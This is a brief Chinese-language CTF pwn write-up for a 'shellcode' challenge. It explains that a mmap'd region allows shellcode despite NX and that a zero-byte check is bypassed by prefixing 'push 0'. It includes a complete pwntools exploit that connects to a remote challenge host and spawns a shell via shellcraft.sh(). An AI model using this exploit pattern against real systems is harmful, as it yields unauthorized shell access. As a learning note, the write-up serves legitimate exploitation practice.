shellcode

记录思路。mmap开了一个空间，查保护的时候有nx,但是有mmap开空间，可读可写。
就可以用shellcraft，但是有一个恶心的判断，导致shellcode送不进去。

我一开始死在了在里面循环硬判断，但是判断一下发现逻辑外面才是重点，要是0，就可以绕开。

点击查看代码

from pwn import*
context(os = 'linux', arch = 'amd64', log_level = 'debug')
io=remote('47.96.253.167',10001)
#io=process("./shellcode")
payload='j\x00'+asm(shellcraft.sh())
io.sendline(payload)
io.interactive()
#print(asm('push 0x00'))

这里输入有细节，直接输入0，我干了很久怎么都打不通后来上网查，发现就是会影响shellcode的完整性，得用汇编送进去，这里有一个指令，asm()教你汇编转16进制。所以脚本出来了